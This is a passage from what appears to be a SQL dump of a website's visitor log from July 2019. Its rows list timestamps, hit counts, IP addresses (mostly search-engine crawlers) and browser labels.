1,0,0,'66.249.66.220','chrome'),(437181,1563966283,1,1,0,0,'141.8.188.65','other'),(437182,1563966456,1,1,0,0,'66.249.66.220','chrome'),(437183,1563966638,1,1,0,0,'180.76.15.144','other'),(437184,1563967496,1,1,0,0,'8.29.198.27','other'),(437185,1563968447,2,2,0,0,'157.55.39.210','other'),(437186,1563968650,2,2,0,0,'40.77.167.218','other'),(437187,1563969387,1,1,0,0,'8.29.198.25','other'),(437188,1563969446,1,1,0,0,'91.196.178.85','chrome'),(437189,1563969692,1,1,0,0,'91.196.178.93','chrome'),(437190,1563969921,1,1,0,0,'91.196.178.79','chrome'),(437191,1563970312,2,2,0,0,'91.196.178.97','chrome'),(437192,1563970507,1,1,0,0,'91.196.122.186','firefox'),(437193,1563970516,1,1,0,0,'37.204.201.114','msie'),(437194,1563970741,1,1,0,0,'87.250.224.81','other'),(437195,1563970806,1,1,0,0,'95.108.181.54','other'),(437196,1563971009,1,1,0,0,'37.9.113.148','other'),(437197,1563972113,1,1,0,0,'157.55.39.79','other'),(437198,1563972690,1,1,0,0,'178.154.171.17','other'),(437199,1563972971,1,1,0,0,'91.196.178.169','chrome'),(437200,1563973056,1,1,0,0,'66.249.66.220','chrome'),(437201,1563973522,1,1,0,0,'66.249.66.218','chrome'),(437202,1563973674,1,1,0,0,'157.55.39.79','other'),(437203,1563974140,1,1,0,0,'37.9.113.20','other'),(437204,1563974297,1,1,0,0,'141.8.188.21','other'),(437205,1563974338,1,1,0,0,'141.8.183.22','other'),(437206,1563974341,1,1,0,0,'95.108.181.75','other'),(437207,1563974759,1,1,0,0,'91.196.178.90','chrome'),(437208,1563974834,1,1,0,0,'66.249.66.128','chrome'),(437209,1563974956,1,1,0,0,'66.249.66.132','chrome'),(437210,1563976120,1,1,0,0,'66.249.66.132','chrome'),(437211,1563976507,1,1,0,0,'207.46.13.212','other'),(437212,1563977063,1,1,0,0,'157.55.39.12','other'),(437213,1563977239,1,1,0,0,'66.249.66.128','chrome'),(437214,1563978039,1,1,0,0,'207.46.13.212','other'),(437215,1563978352,1,1,0,0,'8.29.198.25','other'),(437216,1563979813,1,1,0,0,'47.252.7.66','other'),(437217,1563980270,1,1,0,0,'8.29.198.27','other'),(437218,1563980520,1,1,0,0,'178.154.171.30','other'),(437219,1563980896,1,1,0,0,'207.46.13.211','other'),(437220,1563981012,2,2,0,0,'141.8.188.11','other'),(437221,1563981079,1,1,0,0,'141.8.188.29','other'),(437222,1563981730,1,1,0,0,'91.196.178.88','firefox'),(437223,1563981765,1,1,0,0,'91.209.11.236','other'),(437224,1563982053,1,1,0,0,'207.46.13.212','other'),(437225,1563982074,2,2,0,0,'141.8.188.29','other'),(437226,1563982328,1,1,0,0,'66.249.66.220','chrome'),(437227,1563982601,1,1,0,0,'66.249.66.218','chrome'),(437228,1563983559,2,2,0,0,'66.249.66.220','chrome'),(437229,1563984000,1,1,0,0,'157.55.39.247','other'),(437230,1563984080,1,1,0,0,'66.249.66.222','chrome'),(437231,1563984589,2,2,0,0,'66.249.66.220','chrome'),(437232,1563984654,1,1,0,0,'87.250.224.47','other'),(437233,1563984656,1,1,0,0,'66.249.66.218','chrome'),(437234,1563984682,1,1,0,0,'141.8.142.191','other'),(437235,1563984845,1,1,0,0,'207.46.13.210','other'),(437236,1563984913,1,1,0,0,'87.250.224.65','other'),(437237,1563986082,1,1,0,0,'87.250.224.47','other'),(437238,1563986555,1,1,0,0,'66.249.66.132','chrome'),(437239,1563987059,1,1,0,0,'141.8.188.29','other'),(437240,1563987191,1,1,0,0,'66.249.66.130','chrome'),(437241,1563987248,3,3,0,0,'66.249.66.220','chrome'),(437242,1563987354,1,1,0,0,'66.249.66.222','chrome'),(437243,1563987497,1,1,0,0,'87.250.224.47','other'),(437244,1563987944,1,1,0,0,'66.249.66.128','chrome'),(437245,1563988099,1,1,0,0,'207.46.13.210','other'),(437246,1563988305,2,2,0,0,'66.249.66.218','chrome'),(437247,1563989109,1,1,0,0,'207.46.13.152','other'),(437248,1563989154,4,4,0,0,'66.249.66.220','chrome'),(437249,1563989197,1,1,0,0,'8.29.198.27','other'),(437250,1563989588,1,1,0,0,'66.249.66.132','chrome'),(437251,1563989606,1,1,0,0,'66.249.66.128','chrome'),(437252,1563989635,1,0,1,0,'66.249.66.222',''),(437253,1563989642,2,2,0,0,'66.249.66.222','chrome'),(437254,1563990632,1,1,0,0,'157.55.39.247','other'),(437255,1563990764,3,3,0,0,'66.249.66.218','chrome'),(437256,1563990902,1,1,0,0,'91.209.11.236','other'),(437257,1563991123,1,1,0,0,'8.29.198.26','other'),(437258,1563991642,1,1,0,0,'91.196.178.14','chrome'),(437259,1563991720,1,1,0,0,'207.46.13.166','other'),(437260,1563992007,1,1,0,0,'66.249.66.222','chrome'),(437261,1563992008,3,3,0,0,'66.249.66.220','chrome'),(437262,1563992250,1,1,0,0,'91.196.178.91','firefox'),(437263,1563992466,1,1,0,0,'178.154.171.17','other'),(437264,1563992892,2,2,0,0,'207.46.13.152','other'),(437265,1563993476,1,1,0,0,'207.46.13.166','other'),(437266,1563993850,1,1,0,0,'207.46.13.152','other'),(437267,1563993861,1,1,0,0,'66.249.66.220','chrome'),(437268,1563994650,2,2,0,0,'66.249.66.130','chrome'),(437269,1563994701,1,1,0,0,'66.249.66.218','chrome'),(437270,1563996504,1,1,0,0,'207.46.13.152','other'),(437271,1563997034,1,1,0,0,'5.45.207.19','other'),(437272,1563997158,1,1,0,0,'157.55.39.38','other'),(437273,1563997519,1,1,0,0,'207.46.13.166','other'),(437274,1563997786,1,1,0,0,'95.108.213.4','other'),(437275,1563997959,1,1,0,0,'141.8.183.22','other'),(437276,1563998595,2,2,0,0,'66.249.66.130','chrome'),(437277,1563998643,1,1,0,0,'207.46.13.166','other'),(437278,1563998756,1,1,0,0,'178.154.171.27','other'),(437279,1563998783,1,1,0,0,'213.180.203.23','other'),(437280,1563999096,1,1,0,0,'207.46.13.152','other'),(437281,1563999126,1,1,0,0,'5.255.253.25','other'),(437282,1563999129,1,1,0,0,'37.9.113.38','other'),(437283,1563999437,2,2,0,0,'157.55.39.38','other'),(437284,1563999857,2,2,0,0,'207.46.13.126','other'),(437285,1564000058,1,1,0,0,'8.29.198.26','other'),(437286,1564000376,1,1,0,0,'66.249.66.132','chrome'),(437287,1564000459,1,1,0,0,'66.249.66.218','chrome'),(437288,1564000530,1,1,0,0,'66.249.66.222','chrome'),(437289,1564000538,2,2,0,0,'66.249.66.220','chrome'),(437290,1564000674,1,1,0,0,'91.196.178.177','chrome'),(437291,1564000791,1,1,0,0,'207.46.13.152','other'),(437292,1564001140,1,1,0,0,'66.249.66.130','chrome'),(437293,1564001189,1,1,0,0,'178.154.171.17','other'),(437294,1564001700,3,3,0,0,'66.249.66.222','chrome'),(437295,1564001749,2,2,0,0,'66.249.66.220','chrome'),(437296,1564001970,1,1,0,0,'8.29.198.27','other'),(437297,1564002422,1,1,0,0,'91.196.178.177','chrome'),(437298,1564002590,1,1,0,0,'207.46.13.166','other'),(437299,1564002818,1,1,0,0,'157.55.39.38','other'),(437300,1564003006,1,1,0,0,'66.249.66.222','chrome'),(437301,1564003007,1,1,0,0,'66.249.66.132','chrome'),(437302,1564003068,1,1,0,0,'66.249.66.220','chrome'),(437303,1564003775,1,1,0,0,'87.250.224.47','other'),(437304,1564004065,2,2,0,0,'66.249.66.222','chrome'),(437305,1564004143,1,1,0,0,'66.249.66.132','chrome'),(437306,1564004207,1,1,0,0,'66.249.66.220','chrome'),(437307,1564005444,1,1,0,0,'66.249.66.218','chrome'),(437308,1564005502,1,1,0,0,'207.46.13.126','other'),(437309,1564006422,1,1,0,0,'66.249.66.218','chrome'),(437310,1564006723,1,1,0,0,'13.66.139.0','other'),(437311,1564007215,1,1,0,0,'66.249.66.132','chrome'),(437312,1564007538,1,1,0,0,'207.46.13.166','other'),(437313,1564007635,2,2,0,0,'66.249.66.220','chrome'),(437314,1564007883,1,1,0,0,'207.46.13.126','other'),(437315,1564008608,1,1,0,0,'66.249.66.218','chrome'),(437316,1564008624,1,1,0,0,'66.249.66.220','chrome'),(437317,1564008982,1,1,0,0,'207.46.13.166','other'),(437318,1564009396,1,1,0,0,'207.46.13.126','other'),(437319,1564009570,1,1,0,0,'66.249.66.222','chrome'),(437320,1564009575,3,3,0,0,'66.249.66.220','chrome'),(437321,1564010832,2,2,0,0,'66.249.66.218','chrome'),(437322,1564010907,1,1,0,0,'8.29.198.25','other'),(437323,1564011290,1,1,0,0,'66.249.66.220','chrome'),(437324,1564011812,1,1,0,0,'141.8.188.29','other'),(437325,1564011906,1,1,0,0,'66.249.66.218','chrome'),(437326,1564012107,1,1,0,0,'66.249.66.222','chrome'),(437327,1564012473,1,1,0,0,'40.77.167.106','other'),(437328,1564012515,1,1,0,0,'66.249.66.128','chrome'),(437329,1564012712,1,1,0,0,'66.249.66.220','chrome'),(437330,1564012837,1,1,0,0,'8.29.198.27','other'),(437331,1564013364,1,1,0,0,'66.249.66.130','chrome'),(437332,1564014024,1,1,0,0,'40.77.167.31','other'),(437333,1564014270,1,1,0,0,'207.46.13.126','other'),(437334,1564014315,3,3,0,0,'66.249.66.220','chrome'),(437335,1564014449,1,1,0,0,'66.249.66.132','chrome'),(437336,1564014493,1,1,0,0,'141.8.188.11','other'),(437337,1564015166,2,2,0,0,'66.249.66.218','chrome'),(437338,1564015337,1,1,0,0,'66.249.66.222','chrome'),(437339,1564015411,1,1,0,0,'40.77.167.106','other'),(437340,1564015761,1,1,0,0,'66.249.66.220','chrome'),(437341,1564015769,1,1,0,0,'212.92.123.25','firefox'),(437342,1564016317,1,1,0,0,'66.249.66.130','chrome'),(437343,1564016553,1,1,0,0,'207.46.13.15','other'),(437344,1564016874,1,1,0,0,'66.249.66.220','chrome'),(437345,1564016985,1,1,0,0,'66.249.66.218','chrome'),(437346,1564017207,1,1,0,0,'40.77.167.195','other'),(437347,1564018095,1,1,0,0,'66.249.66.222','chrome'),(437348,1564018136,2,2,0,0,'66.249.66.218','chrome'),(437349,1564018617,1,1,0,0,'91.209.11.236','other'),(437350,1564019216,1,1,0,0,'66.249.66.130','chrome'),(437351,1564019427,1,1,0,0,'66.249.66.218','chrome'),(437352,1564019449,1,1,0,0,'40.77.167.195','other'),(437353,1564020214,1,1,0,0,'66.249.66.222','chrome'),(437354,1564020634,1,1,0,0,'66.249.66.132','chrome'),(437355,1564021255,1,1,0,0,'66.249.66.130','chrome'),(437356,1564021358,2,2,0,0,'66.249.66.222','chrome'),(437357,1564021659,2,2,0,0,'66.249.66.220','chrome'),(437358,1564021750,1,1,0,0,'8.29.198.25','other'),(437359,1564022044,1,1,0,0,'199.16.157.180','other'),(437360,1564022102,1,1,0,0,'141.8.188.11','other'),(437361,1564022438,1,1,0,0,'66.249.66.130','chrome'),(437362,1564022541,2,2,0,0,'66.249.66.222','chrome'),(437363,1564023067,1,1,0,0,'66.249.66.218','chrome'),(437364,1564023693,1,1,0,0,'8.29.198.25','other'),(437365,1564023956,1,1,0,0,'66.249.66.222','chrome'),(437366,1564024351,1,1,0,0,'40.77.167.119','other'),(437367,1564024916,1,1,0,0,'66.249.66.220','chrome'),(437368,1564024938,1,1,0,0,'54.202.134.38','other'),(437369,1564025189,1,1,0,0,'66.249.66.130','chrome'),(437370,1564025595,1,1,0,0,'66.249.66.222','chrome'),(437371,1564025616,1,1,0,0,'13.66.139.0','other'),(437372,1564026855,1,1,0,0,'184.174.118.220','chrome'),(437373,1564027386,2,2,0,0,'66.249.66.220','chrome'),(437374,1564027825,1,1,0,0,'66.249.66.132','chrome'),(437375,1564028037,1,1,0,0,'13.74.137.223','chrome'),(437376,1564028349,2,2,0,0,'207.46.13.15','other'),(437377,1564029184,1,1,0,0,'66.249.66.218','chrome'),(437378,1564030282,1,1,0,0,'66.249.66.132','chrome'),(437379,1564030412,1,1,0,0,'40.77.167.119','other'),(437380,1564030619,1,1,0,0,'66.249.66.130','chrome'),(437381,1564031027,1,1,0,0,'66.249.66.218','chrome'),(437382,1564031074,2,2,0,0,'141.8.188.29','other'),(437383,1564031624,2,2,0,0,'66.249.66.220','chrome'),(437384,1564032593,1,1,0,0,'8.29.198.25','other'),(437385,1564032675,1,1,0,0,'178.94.172.182','chrome'),(437386,1564032819,1,1,0,0,'66.249.66.132','chrome'),(437387,1564032850,1,1,0,0,'207.46.13.15','other'),(437388,1564032890,1,1,0,0,'66.249.66.128','chrome'),(437389,1564032892,2,2,0,0,'66.249.66.222','chrome'),(437390,1564033268,1,1,0,0,'66.249.66.130','chrome'),(437391,1564033311,2,2,0,0,'66.249.66.220','chrome'),(437392,1564033848,1,1,0,0,'91.196.178.73','chrome'),(437393,1564033857,1,1,0,0,'185.248.160.231','other'),(437394,1564033882,1,1,0,0,'66.249.66.132','chrome'),(437395,1564034014,1,1,0,0,'66.249.66.222','chrome'),(437396,1564034034,1,1,0,0,'66.249.66.218','chrome'),(437397,1564034544,1,1,0,0,'8.29.198.27','other'),(437398,1564034916,1,1,0,0,'91.196.178.73','chrome'),(437399,1564035219,1,1,0,0,'66.249.66.222','chrome'),(437400,1564035289,1,1,0,0,'66.249.66.220','chrome'),(437401,1564035480,1,1,0,0,'40.77.167.119','other'),(437402,1564035998,1,1,0,0,'141.8.188.29','other'),(437403,1564036058,1,1,0,0,'40.77.167.21','other'),(437404,1564036502,1,1,0,0,'66.249.66.222','chrome'),(437405,1564037003,2,2,0,0,'66.249.66.220','chrome'),(437406,1564037592,2,2,0,0,'66.249.66.218','chrome'),(437407,1564037667,1,1,0,0,'157.55.39.64','other'),(437408,1564038074,1,1,0,0,'207.46.13.159','other'),(437409,1564038217,1,1,0,0,'66.249.66.130','chrome'),(437410,1564038472,1,1,0,0,'141.8.188.11','other'),(437411,1564039540,2,2,0,0,'157.55.39.64','other'),(437412,1564040092,1,1,0,0,'66.249.66.218','chrome'),(437413,1564040136,2,2,0,0,'66.249.66.220','chrome'),(437414,1564040771,1,1,0,0,'66.249.66.222','chrome'),(437415,1564040831,1,1,0,0,'66.249.66.130','chrome'),(437416,1564040923,1,1,0,0,'66.249.66.128','chrome'),(437417,1564041150,1,1,0,0,'207.46.13.159','other'),(437418,1564041404,2,2,0,0,'66.249.66.218','chrome'),(437419,1564041599,1,1,0,0,'52.162.161.148','other'),(437420,1564042143,1,1,0,0,'66.249.66.128','chrome'),(437421,1564042250,1,1,0,0,'207.46.13.159','other'),(437422,1564042755,1,1,0,0,'141.8.188.29','other'),(437423,1564043447,1,1,0,0,'8.29.198.27','other'),(437424,1564043726,1,1,0,0,'66.249.66.220','chrome'),(437425,1564043788,1,1,0,0,'66.249.66.218','chrome'),(437426,1564043990,1,1,0,0,'91.196.178.70','chrome'),(437427,1564044047,1,1,0,0,'40.77.167.158','other'),(437428,1564045256,1,1,0,0,'207.46.13.159','other'),(437429,1564045303,2,2,0,0,'66.249.66.220','chrome'),(437430,1564045393,1,1,0,0,'8.29.198.26','other'),(437431,1564046168,1,1,0,0,'66.249.66.130','chrome'),(437432,1564046191,1,1,0,0,'66.249.66.128','chrome'),(437433,1564046224,3,3,0,0,'66.249.66.222','chrome'),(437434,1564046887,1,1,0,0,'40.77.167.158','other'),(437435,1564046945,1,1,0,0,'157.55.39.235','other'),(437436,1564046978,2,2,0,0,'207.46.13.159','other'),(437437,1564047097,1,1,0,0,'66.249.66.218','chrome'),(437438,1564047541,2,2,0,0,'66.249.66.220','chrome'),(437439,1564048050,1,1,0,0,'66.249.66.222','chrome'),(437440,1564048317,1,1,0,0,'141.8.188.11','other'),(437441,1564048403,1,1,0,0,'178.93.60.56','chrome'),(437442,1564049136,1,1,0,0,'157.55.39.64','other'),(437443,1564049242,1,1,0,0,'66.249.66.132','chrome'),(437444,1564049886,2,2,0,0,'207.46.13.159','other'),(437445,1564049968,1,1,0,0,'66.249.66.130','chrome'),(437446,1564050463,1,1,0,0,'66.249.66.128','chrome'),(437447,1564050562,2,2,0,0,'66.249.66.222','chrome'),(437448,1564050603,2,2,0,0,'66.249.66.220','chrome'),(437449,1564050650,1,1,0,0,'109.74.154.72','chrome'),(437450,1564050668,1,1,0,0,'40.77.167.158','other'),(437451,1564050677,1,1,0,0,'157.55.39.64','other'),(437452,1564050877,1,1,0,0,'207.46.13.159','other'),(437453,1564051228,1,1,0,0,'141.8.188.29','other'),(437454,1564051733,1,1,0,0,'157.55.39.64','other'),(437455,1564051821,2,2,0,0,'66.249.66.222','chrome'),(437456,1564051854,3,3,0,0,'207.46.13.159','other'),(437457,1564051927,1,1,0,0,'40.77.167.127','other'),(437458,1564052294,2,2,0,0,'66.249.66.218','chrome'),(437459,1564052485,1,1,0,0,'180.76.15.151','other'),(437460,1564052987,1,1,0,0,'91.196.179.33','chrome'),(437461,1564053460,1,1,0,0,'130.180.218.216','chrome'),(437462,1564053700,1,1,0,0,'91.196.178.70','chrome'),(437463,1564053805,1,1,0,0,'66.249.66.218','chrome'),(437464,1564054134,1,1,0,0,'66.249.66.130','chrome'),(437465,1564054160,1,1,0,0,'40.77.167.23','other'),(437466,1564054169,2,2,0,0,'66.249.66.222','chrome'),(437467,1564054296,1,1,0,0,'8.29.198.26','other'),(437468,1564054320,2,2,0,0,'157.55.39.124','other'),(437469,1564054565,1,1,0,0,'141.8.188.29','other'),(437470,1564054588,1,1,0,0,'141.8.188.11','other'),(437471,1564054857,4,4,0,0,'66.249.66.218','chrome'),(437472,1564055064,1,1,0,0,'46.211.115.244','chrome'),(437473,1564055513,1,1,0,0,'141.8.188.11','other'),(437474,1564055661,1,1,0,0,'66.249.66.220','chrome'),(437475,1564055917,1,1,0,0,'157.55.39.211','other'),(437476,1564055921,1,1,0,0,'40.77.167.23','other'),(437477,1564055924,1,1,0,0,'66.249.66.222','chrome'),(437478,1564055929,1,1,0,0,'40.77.167.127','other'),(437479,1564056261,1,1,0,0,'8.29.198.27','other'),(437480,1564056315,1,1,0,0,'66.249.66.130','chrome'),(437481,1564056820,1,1,0,0,'207.46.13.60','other'),(437482,1564056824,2,2,0,0,'157.55.39.211','other'),(437483,1564056870,1,1,0,0,'66.249.66.132','chrome'),(437484,1564057156,1,1,0,0,'66.249.66.222','chrome'),(437485,1564057278,1,1,0,0,'66.249.66.220','chrome'),(437486,1564057297,2,2,0,0,'66.249.66.218','chrome'),(437487,1564058499,4,4,0,0,'66.249.66.222','chrome'),(437488,1564058605,1,1,0,0,'66.249.66.220','chrome'),(437489,1564058846,2,2,0,0,'95.135.240.178','chrome'),(437490,1564059579,1,1,0,0,'66.249.66.128','chrome'),(437491,1564059786,1,1,0,0,'40.77.167.23','other'),(437492,1564059905,2,2,0,0,'157.55.39.211','other'),(437493,1564059909,1,1,0,0,'157.55.39.86','other'),(437494,1564060169,2,2,0,0,'66.249.66.218','chrome'),(437495,1564060741,1,1,0,0,'66.249.66.130','chrome'),(437496,1564060830,3,3,0,0,'207.46.13.60','other'),(437497,1564060910,1,1,0,0,'157.55.39.211','other'),(437498,1564060931,1,1,0,0,'66.249.66.220','chrome'),(437499,1564061036,1,1,0,0,'91.196.178.85','firefox'),(437500,1564061169,1,1,0,0,'91.196.178.90','chrome'),(437501,1564061699,1,1,0,0,'66.249.66.132','chrome'),(437502,1564062016,2,2,0,0,'157.55.39.211','other'),(437503,1564062064,1,1,0,0,'66.249.66.218','chrome'),(437504,1564062638,1,1,0,0,'66.249.66.132','chrome'),(437505,1564062661,1,1,0,0,'66.249.66.130','chrome'),(437506,1564062747,1,1,0,0,'157.55.39.86','other'),(437507,1564063237,1,1,0,0,'91.196.179.33','chrome'),(437508,1564063260,2,2,0,0,'66.249.66.218','chrome'),(437509,1564063345,1,1,0,0,'66.249.66.220','chrome'),(437510,1564063916,1,1,0,0,'66.249.66.222','chrome'),(437511,1564064475,1,1,0,0,'157.55.39.211','other'),(437512,1564064997,1,1,0,0,'207.46.13.214','other'),(437513,1564065068,3,3,0,0,'66.249.66.218','chrome'),(437514,1564065090,4,4,0,0,'66.249.66.128','chrome'),(437515,1564065178,1,1,0,0,'8.29.198.25','other'),(437516,1564065473,1,1,0,0,'207.46.13.102','other'),(437517,1564065754,2,2,0,0,'66.249.66.222','chrome'),(437518,1564065763,1,1,0,0,'66.249.66.220','chrome'),(437519,1564066259,1,1,0,0,'66.249.66.218','chrome'),(437520,1564066634,2,2,0,0,'141.8.188.29','other'),(437521,1564066796,1,1,0,0,'66.249.66.128','chrome'),(437522,1564067135,1,1,0,0,'8.29.198.25','other'),(437523,1564067525,2,2,0,0,'207.46.13.102','other'),(437524,1564067852,2,2,0,0,'207.46.13.214','other'),(437525,1564068154,1,1,0,0,'66.249.66.218','chrome'),(437526,1564068708,1,1,0,0,'141.8.188.29','other'),(437527,1564068971,1,1,0,0,'207.46.13.102','other'),(437528,1564069208,2,2,0,0,'66.249.66.222','chrome'),(437529,1564069253,3,3,0,0,'66.249.66.218','chrome'),(437530,1564069255,2,2,0,0,'66.249.66.220','chrome'),(437531,1564069341,1,1,0,0,'141.8.188.11','other'),(437532,1564069519,1,1,0,0,'66.249.66.128','chrome'),(437533,1564069798,1,1,0,0,'207.46.13.214','other'),(437534,1564071121,1,1,0,0,'66.249.66.128','chrome'),(437535,1564071337,1,1,0,0,'5.45.207.19','other'),(437536,1564071390,2,2,0,0,'207.46.13.0','other'),(437537,1564071684,2,2,0,0,'207.46.13.214','other'),(437538,1564072514,1,1,0,0,'66.249.66.222','chrome'),(437539,1564072602,1,1,0,0,'66.249.66.220','chrome'),(437540,1564073151,1,1,0,0,'207.46.13.0','other'),(437541,1564073278,2,2,0,0,'158.69.52.114','chrome'),(437542,1564073432,1,1,0,0,'141.8.188.11','other'),(437543,1564073599,2,2,0,0,'66.249.66.218','chrome'),(437544,1564073868,1,1,0,0,'95.108.213.4','other'),(437545,1564073899,1,1,0,0,'157.55.39.233','other'),(437546,1564073938,1,1,0,0,'207.46.13.131','other'),(437547,1564073978,1,1,0,0,'66.249.66.222','chrome'),(437548,1564074397,1,1,0,0,'66.249.66.128','chrome'),(437549,1564074846,1,1,0,0,'141.8.188.11','other'),(437550,1564074876,1,1,0,0,'66.249.66.220','chrome'),(437551,1564074879,1,1,0,0,'141.8.188.29','other'),(437552,1564074895,1,1,0,0,'66.249.66.218','chrome'),(437553,1564074916,1,1,0,0,'207.46.13.0','other'),(437554,1564075326,2,2,0,0,'157.55.39.132','other'),(437555,1564076055,1,1,0,0,'8.29.198.25','other'),(437556,1564076160,1,1,0,0,'66.249.66.220','chrome'),(437557,1564076298,1,1,0,0,'157.55.39.132','other'),(437558,1564076401,1,1,0,0,'66.249.66.218','chrome'),(437559,1564076736,1,1,0,0,'141.8.188.29','other'),(437560,1564076870,2,2,0,0,'66.249.66.130','chrome'),(437561,1564077114,1,1,0,0,'66.249.66.222','chrome'),(437562,1564077405,1,1,0,0,'66.249.66.220','chrome'),(437563,1564077435,1,1,0,0,'207.46.13.131','other'),(437564,1564077593,1,1,0,0,'66.249.66.218','chrome'),(437565,1564078017,1,1,0,0,'8.29.198.27','other'),(437566,1564078587,2,2,0,0,'66.249.66.222','chrome'),(437567,1564078638,1,1,0,0,'66.249.66.132','chrome'),(437568,1564078659,2,2,0,0,'66.249.66.218','chrome'),(437569,1564079134,1,1,0,0,'66.249.66.128','chrome'),(437570,1564079161,1,1,0,0,'66.249.66.220','chrome'),(437571,1564079201,1,1,0,0,'66.249.66.130','chrome'),(437572,1564079240,1,1,0,0,'207.46.13.214','other'),(437573,1564079247,2,2,0,0,'141.8.188.29','other'),(437574,1564079969,1,1,0,0,'66.249.66.218','chrome'),(437575,1564080062,1,1,0,0,'66.249.66.220','chrome'),(437576,1564080738,1,1,0,0,'157.55.39.132','other'),(437577,1564080744,2,2,0,0,'66.249.66.222','chrome'),(437578,1564081757,2,2,0,0,'66.249.66.222','chrome'),(437579,1564081835,8,8,0,0,'178.159.37.128','firefox'),(437580,1564082532,4,4,0,0,'207.46.13.131','other'),(437581,1564082536,2,2,0,0,'157.55.39.132','other'),(437582,1564082796,4,4,0,0,'66.249.66.220','chrome'),(437583,1564083555,1,1,0,0,'207.46.13.131','other'),(437584,1564083599,1,1,0,0,'66.249.66.132','chrome'),(437585,1564083692,1,1,0,0,'66.249.66.218','chrome'),(437586,1564083876,1,1,0,0,'5.45.207.79','other'),(437587,1564083921,2,2,0,0,'207.46.13.214','other'),(437588,1564083931,1,1,0,0,'141.8.188.29','other'),(437589,1564083943,1,1,0,0,'141.8.142.103','other'),(437590,1564084170,1,1,0,0,'157.55.39.132','other'),(437591,1564084329,2,2,0,0,'66.249.66.220','chrome'),(437592,1564084382,1,1,0,0,'180.76.15.28','other'),(437593,1564084390,1,1,0,0,'87.250.224.65','other'),(437594,1564084569,1,1,0,0,'66.249.66.222','chrome'),(437595,1564084751,1,1,0,0,'46.211.70.102','chrome'),(437596,1564085124,2,2,0,0,'207.46.13.214','other'),(437597,1564085763,1,1,0,0,'17.58.97.174','other'),(437598,1564085787,1,1,0,0,'66.249.66.222','chrome'),(437599,1564086046,2,2,0,0,'66.249.66.220','chrome'),(437600,1564086162,1,1,0,0,'207.46.13.214','other'),(437601,1564086399,2,2,0,0,'66.249.66.218','chrome'),(437602,1564086728,1,1,0,0,'46.211.47.189','other'),(437603,1564086913,1,1,0,0,'8.29.198.26','other'),(437604,1564087081,2,2,0,0,'66.249.66.222','chrome'),(437605,1564087187,1,1,0,0,'141.8.188.29','other'),(437606,1564088489,2,2,0,0,'66.249.66.218','chrome'),(437607,1564088538,1,1,0,0,'66.249.66.220','chrome'),(437608,1564088792,2,2,0,0,'207.46.13.131','other'),(437609,1564088869,1,1,0,0,'8.29.198.25','other'),(437610,1564089087,1,1,0,0,'157.55.39.245','other'),(437611,1564089377,1,1,0,0,'66.249.66.130','chrome'),(437612,1564089681,2,2,0,0,'66.249.66.218','chrome'),(437613,1564089785,2,2,0,0,'66.249.66.222','chrome'),(437614,1564089813,2,2,0,0,'66.249.66.220','chrome'),(437615,1564090644,1,1,0,0,'207.46.13.131','other'),(437616,1564090899,1,1,0,0,'66.249.66.132','chrome'),(437617,1564090912,1,1,0,0,'207.46.13.86','other'),(437618,1564091009,2,2,0,0,'66.249.66.222','chrome'),(437619,1564091020,3,3,0,0,'66.249.66.218','chrome'),(437620,1564091214,2,2,0,0,'66.249.66.220','chrome'),(437621,1564091378,1,1,0,0,'66.249.66.130','chrome'),(437622,1564091387,1,1,0,0,'141.8.188.11','other'),(437623,1564091464,1,1,0,0,'5.45.207.19','other'),(437624,1564092268,2,2,0,0,'207.46.13.86','other'),(437625,1564092291,1,1,0,0,'66.249.66.220','chrome'),(437626,1564092798,1,1,0,0,'157.55.39.132','other'),(437627,1564093239,1,1,0,0,'141.8.188.11','other'),(437628,1564093405,1,1,0,0,'95.108.213.4','other'),(437629,1564094303,1,1,0,0,'66.249.66.218','chrome'),(437630,1564094432,2,2,0,0,'66.249.66.220','chrome'),(437631,1564094518,1,1,0,0,'207.46.13.86','other'),(437632,1564094524,2,2,0,0,'207.46.13.131','other'),(437633,1564094571,1,1,0,0,'66.249.66.128','chrome'),(437634,1564094685,3,3,0,0,'78.46.85.236','other'),(437635,1564095291,1,1,0,0,'157.55.39.132','other'),(437636,1564095363,1,1,0,0,'66.249.66.220','chrome'),(437637,1564095529,1,1,0,0,'66.249.66.128','chrome'),(437638,1564095551,1,1,0,0,'66.249.66.218','chrome'),(437639,1564096386,1,1,0,0,'173.208.200.154','other'),(437640,1564096492,1,1,0,0,'141.8.188.11','other'),(437641,1564096636,1,1,0,0,'157.55.39.132','other'),(437642,1564097205,2,2,0,0,'66.249.66.130','chrome'),(437643,1564097258,2,2,0,0,'66.249.66.218','chrome'),(437644,1564097275,1,1,0,0,'66.249.66.220','chrome'),(437645,1564097280,2,2,0,0,'66.249.66.222','chrome'),(437646,1564097382,1,1,0,0,'207.46.13.86','other'),(437647,1564097764,1,1,0,0,'8.29.198.26','other'),(437648,1564098277,2,2,0,0,'66.249.66.128','chrome'),(437649,1564098343,1,1,0,0,'66.249.66.220','chrome'),(437650,1564098657,2,2,0,0,'207.46.13.86','other'),(437651,1564098671,2,2,0,0,'66.249.66.218','chrome'),(437652,1564098723,2,2,0,0,'141.8.188.11','other'),(437653,1564098755,2,2,0,0,'207.46.13.92','other'),(437654,1564099127,1,1,0,0,'66.249.66.222','chrome'),(437655,1564099646,1,1,0,0,'66.249.66.218','chrome'),(437656,1564099723,1,1,0,0,'8.29.198.25','other'),(437657,1564100432,1,1,0,0,'207.46.13.131','other'),(437658,1564100796,1,1,0,0,'141.8.188.29','other'),(437659,1564100884,1,1,0,0,'66.249.66.222','chrome'),(437660,1564101014,1,1,0,0,'5.45.207.79','other'),(437661,1564101479,2,2,0,0,'66.249.66.218','chrome'),(437662,1564101600,1,1,0,0,'66.249.66.220','chrome'),(437663,1564101981,1,1,0,0,'66.249.66.222','chrome'),(437664,1564102975,1,1,0,0,'207.46.13.76','other'),(437665,1564103105,4,4,0,0,'157.55.39.100','other'),(437666,1564103960,1,1,0,0,'87.250.224.47','other'),(437667,1564104008,1,1,0,0,'37.9.113.103','other'),(437668,1564104013,1,1,0,0,'66.249.66.222','chrome'),(437669,1564104950,1,1,0,0,'87.250.224.81','other'),(437670,1564105218,1,1,0,0,'66.249.66.222','chrome'),(437671,1564105495,1,1,0,0,'5.45.207.79','other'),(437672,1564105688,1,1,0,0,'213.180.203.17','other'),(437673,1564105824,2,2,0,0,'5.45.207.19','other'),(437674,1564105845,1,1,0,0,'141.8.188.29','other'),(437675,1564105994,1,1,0,0,'37.9.113.20','other'),(437676,1564106005,1,1,0,0,'66.249.66.220','chrome'),(437677,1564106686,2,2,0,0,'66.249.66.218','chrome'),(437678,1564106972,1,1,0,0,'66.249.66.222','chrome'),(437679,1564107634,1,1,0